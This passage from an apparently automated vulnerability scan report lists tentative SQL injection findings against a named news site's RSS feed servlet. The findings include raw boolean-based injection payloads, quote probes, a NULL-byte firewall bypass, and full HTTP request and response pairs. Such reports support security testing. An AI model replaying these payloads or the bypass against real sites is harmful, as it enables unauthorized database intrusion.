<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.13. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200222.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67192433%20or%201%3d1--%20 and 67192433%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d1--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:18 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d2--%20/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.14. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200224.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss'%20and%201%3d1--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss'%20and%201%3d2--%20/CustomRssServlet/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Location: http://origin.feeds.mercurynews.com/defaultError.jhtml
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>


1.15. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200224.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200224.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:20:39 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200224.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:39 GMT
Content-Length: 0
Connection: close


1.16. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200729.xml [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200729.xml

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18085221%20or%201%3d1--%20 and 18085221%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d1--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:37 GMT
Content-Length: 23879
Connection: close
X-N: S

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1111/20101111__quakes~1.JPG"
length="154740"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[Quakes owner: New stadium in about two years]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid>
<description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate>
</item>
<item>
<title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid>
<description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate>
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg"
length="36852"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York]]></title
...[SNIP]...

Request 2

GET /mngi/rss/CustomRssServlet/568/200729.xml?118085221%20or%201%3d2--%20=1 HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Date: Tue, 07 Dec 2010 23:21:41 GMT
Content-Length: 23889
Connection: close
X-N: S

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1104/20101104_091315_11.4.quakeslisting.jpg"
length="0"
type="image/jpeg"/>
</item>
<item>
<title><![CDATA[Quakes owner: New stadium in about two years]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16590945?source=rss]]></guid>
<description><![CDATA[The San Jose Earthquakes hope to open a 15,000-seat soccer stadium in 2012, and no later than 2013, owner Lew Wolff said in an interview this week.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 22:07:45 PST]]></pubDate>
</item>
<item>
<title><![CDATA[San Jose Earthquakes' Bobby Convey named MLS Comeback Player of Year]]></title>
<link><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></link>
<guid><![CDATA[http://www.mercurynews.com/earthquakes/ci_16578286?source=rss]]></guid>
<description><![CDATA[Midfielder had career-high 10 assists in helping Earthquakes reach playoffs after injuries limited him to one goal and two assists in 2009.]]></description>
<dc:creator>&lt;p class="bylinejb"&gt;By Elliott Almond&lt;br /&gt;&lt;/p&gt;&lt;p class="bylineaffiliation"&gt;&lt;a href='mailto:ealmond@mercurynews.com'&gt;ealmond@mercurynews.com&lt;/a&gt;</dc:creator>
<pubDate><![CDATA[Thu, 11 Nov 2010 05:44:58 PST]]></pubDate>
<enclosure url="http://extras.mnginteractive.com/live/media/site568/2010/1110/20101110_081624_convey.jpg"
length="36852"
type="image/pjpeg"/>
</item>
<item>
<title><![CDATA[San Jose Earthquakes gets bullied at home in playoffs by New York
...[SNIP]...

1.17. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200733.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200733.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:07 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200733.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.18. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200736.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200736.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 55498630%20or%201%3d1--%20 and 55498630%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d1--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:33 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56855498630%20or%201%3d2--%20/200736.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:33 GMT
Content-Length: 0
Connection: close


1.19. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200738.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200738.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:41 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200738.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:41 GMT
Content-Length: 0
Connection: close


1.20. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200742.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:04 GMT
Content-Length: 0
Connection: close


1.21. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200742.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200742.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 15112565%20or%201%3d1--%20 and 15112565%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d1--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:09 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56815112565%20or%201%3d2--%20/200742.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:09 GMT
Connection: close

